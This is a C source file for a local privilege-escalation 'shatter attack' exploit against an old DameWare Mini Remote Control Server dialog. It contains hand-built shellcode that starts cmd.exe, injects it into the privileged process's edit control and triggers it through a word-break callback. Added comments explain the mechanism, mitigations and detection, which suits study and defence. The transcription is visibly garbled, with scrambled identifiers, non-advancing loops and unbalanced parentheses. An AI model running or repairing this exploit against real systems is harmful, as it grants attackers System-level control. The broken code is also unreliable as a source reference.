/*
Dameware Mini Remote Control Server Local System Exploit
Vulnerable Versions Prior to 3.71.0.0 by ash@felinemenmenace.org
This code is based on shards.cpp by Xenophile
*/
#define Win32_Lean_and_mean
#include
#include
#pragma Warning (Disable: 4305)
#pragma Warning (Disable: 4309)
/*
 * Makeshellcode: hand-assembled x86 payload written into Buffer[0..300].
 *
 * This listing is a damaged transcription (identifier case is scrambled,
 * "loadingLibrary"/"getProcaddress", and the `COUNT ;` statements are not
 * increments), so it does not compile as shown. The comments below describe
 * what the visible bytes and calls are, not a working tool.
 *
 * Layout as written:
 *   [0..35]    0x90 (x86 NOP) from the first loop; [36] is left untouched
 *   [37..76]   fixed opcode bytes; the constants 0x63,0x6d,0x64,0x2e,0x65,
 *              0x78,0x65 are the ASCII of "cmd.exe", so the payload's end
 *              goal is starting a command interpreter
 *   [77..81]   0xb8 followed by the four raw bytes of lpsystem, i.e. the
 *              address of msvcrt's "System" export resolved in THIS process
 *              and baked into the payload -- only meaningful if the target
 *              process maps msvcrt.dll at the same base (pre-ASLR assumption)
 *   [82..89]   fixed opcode bytes
 *   [90..290]  0x90 filler from the second loop
 *   [291..300] eight constant bytes, then two zero bytes
 *
 * Buffer must have room for at least 301 bytes; nothing here checks that
 * (no length parameter). Defender note: the observable artefact of this
 * payload is a command interpreter started as a child of the privileged
 * process that ends up executing it.
 */
Void Makeshellcode (Char * Buffer)
{
HModule HCRT;
Void * lpsystem;
INT count = 0;
// First filler run: indices 0..35. As transcribed the body never advances
// count, so this loop would not terminate -- transcription damage.
While (count <36)
{
Buffer [count] = 0x90;
COUNT ;
}
Buffer [37] = 0x8b; buffer [38] = 0xE5; buffer [39] = 0x55;
Buffer [40] = 0x8b; buffer [41] = 0xec; buffer [42] = 0x33;
Buffer [43] = 0xff; buffer [44] = 0x90; buffer [45] = 0x57;
Buffer [46] = 0x83; buffer [47] = 0xec; buffer [48] = 0x04;
// Bytes 49..76: stores of the ASCII characters 'c','m','d','.','e','x','e'
// (0x63 0x6d 0x64 0x2e 0x65 0x78 0x65) interleaved with fixed opcode bytes.
Buffer [49] = 0xc6; buffer [50] = 0x45; buffer [51] = 0xF8;
Buffer [52] = 0x63; buffer [53] = 0xc6; buffer [54] = 0x45;
Buffer [55] = 0xf9; buffer [56] = 0x6d; buffer [57] = 0xc6;
Buffer [58] = 0x45; buffer [59] = 0xfa; buffer [60] = 0x64;
Buffer [61] = 0xc6; buffer [62] = 0x45; buffer [63] = 0xfb;
Buffer [64] = 0x2e; buffer [65] = 0xc6; buffer [66] = 0x45;
Buffer [67] = 0xfc; buffer [68] = 0x65; buffer [69] = 0xc6;
Buffer [70] = 0x45; buffer [71] = 0xfd; buffer [72] = 0x78;
Buffer [73] = 0xc6; buffer [74] = 0x45; buffer [75] = 0xfe;
Buffer [76] = 0x65;
// Resolve msvcrt's "System" export in the current process (names garbled;
// presumably LoadLibrary/GetProcAddress). Neither return value is checked:
// a NULL lpsystem would be embedded below without complaint.
HCRT = loadingLibrary ("msvcrt.dll");
lpsystem = getProcaddress (HCRT, "System");
Buffer [77] = 0xb8;
// The four raw bytes of the resolved pointer, copied in memory order.
Buffer [78] = ((char *) & lpsystem) [0];
Buffer [79] = ((char *) & lpsystem) [1];
Buffer [80] = ((char *) & lpsystem) [2];
Buffer [81] = ((char *) & lpsystem) [3];
Buffer [82] = 0x50; buffer [83] = 0x8d; buffer [84] = 0x45;
Buffer [85] = 0xf8; buffer [86] = 0x50; buffer [87] = 0xff; buffer [88] = 0x55; buffer [89] = 0xF4;
// Second filler run: indices 90..290 (same non-advancing loop as above).
Count = 90;
While (count <291)
{
Buffer [count] = 0x90;
COUNT ;
}
// Trailing constants: the same four bytes appear twice (looks like one
// little-endian 32-bit value repeated -- the page gives no explanation),
// followed by two zero bytes that terminate the buffer as a C string.
Buffer [291] = 0x24; buffer [292] = 0xf1; buffer [293] = 0x5d;
Buffer [294] = 0x01; buffer [295] = 0x26; buffer [296] = 0xf1;
Buffer [297] = 0x5d; buffer [298] = 0x01; BUFFER [299] = 0x00;
BUFFER [300] = 0x00;
Return;
}
/*
 * ErrorNotify: print the system message text for a Win32 error code.
 *
 * ERR   - error code, normally the value of GetLastError().
 * Title - accepted but never referenced in this body.
 *
 * NOTE(review): the FormatMessage result is not checked. If it fails, the
 * uninitialised LPMSGBUF is passed to Printf and LocalFree. As transcribed
 * the FormatMessage call is also missing its opening parenthesis, and the
 * format string reads "% S / N" (presumably "%s\n" originally).
 */
Void ErrorNotify (DWORD ERR, Char * Title)
{
LPVOID LPMSGBUF;
// FORMAT_MESSAGE_ALLOCATE_BUFFER: the system allocates the message buffer,
// which is why the address of the pointer is passed and LocalFree follows.
FormatMessage
FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
Err,
Makelangid (lang_neutral, subslang_default), // default language
(Lptstr) & lpmsgbuf,
0,
NULL
);
Printf ("% S / N", LPMSGBUF);
LocalFree (lpmsgbuf);
}
// Size of the buffer handed to the edit control (256 KiB), and the offset at
// which Makeshellcode's 301-byte payload is placed: 400 bytes before the end.
#define shellcode_size (1024 * 256)
#define shellcode_offset (shellcode_size -400)
/*
 * main: drives the shatter attack described in the file header against the
 * "About DameWare Mini Remote Control Server" dialog (affected versions per
 * the header: before 3.71.0.0). Argc and argv are unused.
 *
 * Sequence as written:
 *   1. Build a 256 KiB buffer SC: a 4-byte "xen0" prefix, 0x90 (NOP) filler,
 *      and the Makeshellcode payload placed 400 bytes before the end.
 *   2. Locate the dialog by exact title and its child "Edit" control.
 *   3. EM_SETREADONLY 0, EM_SETLIMITTEXT shellcode_size and WM_SETTEXT copy
 *      SC into the edit control -- i.e. into the address space of the process
 *      owning the dialog, which the header says runs as Local System.
 *   4. Read a user-supplied address with Scanf and hand it to the control as
 *      its EM_SETWORDBREAKPROC callback; a synthetic WM_LBUTTONDBLCLK then
 *      makes the owning process call that pointer.
 *
 * Why it worked: pre-Vista Windows let any process on the interactive desktop
 * send these messages to a privileged window, and a word-break procedure is a
 * raw function pointer chosen by the sender. Mitigations that close this
 * class: User Interface Privilege Isolation and session-0 isolation of
 * services (Vista and later), the vendor fix named in the header, and not
 * running privileged GUI on the user's desktop. Detection hint: a command
 * interpreter whose parent is the remote-control service process.
 *
 * Transcription damage: unbalanced parentheses (MEMSET, Makeshellcode,
 * FindWindowEx, Scanf), string literals split across lines, scrambled
 * identifier case, and "/ n" where "\n" was meant; it does not compile as
 * shown.
 */
Int main (int Argc, char * argv [])
{
Hwnd hwnd;
HWND HWNDCHILD;
CHAR SC [shellcode_size]; // 256 KiB automatic array -- large for a stack local
Char szwindowname [] = "About DameWare Mini Remote Control Server";
Long lexecaddress; // uninitialised until Scanf below
// 4-byte marker prefix, then 0x90 (x86 NOP) over the rest of the buffer.
SC [0] = 'x'; sc [1] = 'e'; SC [2] = 'n'; SC [3] = '0';
MEMSET (& sc [4], 0x90, shellcode_size -4;
// Payload occupies SC[shellcode_size-400 .. shellcode_size-100]; Makeshellcode
// writes indices 0..300 of its argument, so it stays inside SC. Its two
// trailing zero bytes are the first NULs in SC (unless an embedded address
// byte is zero), so WM_SETTEXT below copies everything up to that point.
Makeshellcode (& SC [shellcode_offset);
Printf ("/nfm-shatterdame.c/nash@felinementece.org/N");
Printf ("--------------------------------------------- --------------- / n ");
Printf ("Exploits Shatter Attack in Dameware Mini Remote Control
Server / n ");
Printf ("this is based on shards.cpp written by xenophile./n");
Printf ("--------------------------------------------- --------------- / n ");
PRINTF
"Step 1: Finding Our WINDOW! / N"
);
// Exact title match; "Szwindown" vs "szwindowname" is transcription damage.
HWND = FindWindow (Null, Szwindown);
IF (hwnd == null)
{
Printf ("COULDN't Find The DameWare About Dialogue. Open IT and RE-RUN
THIS / N ");
Return 0; // exits with 0 even though the precondition failed
}
// First child of class "Edit" inside the dialog.
HWNDCHILD = FindWindowEx (HWND, NULL, "Edit", NULL;
IF (hwndchild == null)
{
Printf ("/ tcouldn't Find Child Edit Control WINDOW / N");
Return 0; // likewise a 0 exit on failure
}
// Clear read-only, raise the text limit to the buffer size, then copy SC
// into the control; the text lands in the owning process's memory.
SendMessage (HWndchild, Em_setReadonly, 0, 0);
SendMessage (hwndchild, em_setlimittext, shellcode_size, 0L);
IF (! SENDMESSAGE (HWNDCHILD, WM_SETTEXT, 0, (LPARAM) SC)) {
ErrorNotify (GetLastError (), "Error");
}
PRINTF
"/ N / NSTEP 2: Enter shell code address."
"This can be bound using a debugger."
);
Printf ("/ Non My XP SP1 Machine 0x160000 Worked./N");
Printf ("/ N / NENTER EXECUTION Address:");
// NOTE(review): "%x" expects unsigned int* but lexecaddress is long, and the
// return value is unchecked -- non-hex input leaves lexecaddress uninitialised
// and it is still passed on below.
Scanf ("% x", & lexecaddress;
// The shatter primitive: the target's edit control now holds a caller-chosen
// function pointer as its word-break procedure.
IF (! sendMessage (hwndchild, em_setwordbreakproc, 0L,
(LParam) LexecAddress)) {
ErrorNotify (GetLastError (), "Error");
}
// A double-click at client coordinates (10,10) makes the control invoke its
// word-break procedure inside the owning process.
SendMessage (hwndchild, wm_lbuttondblclk, mk_lbutton,
(Lparam) 0x000A000A);
Return 0;
}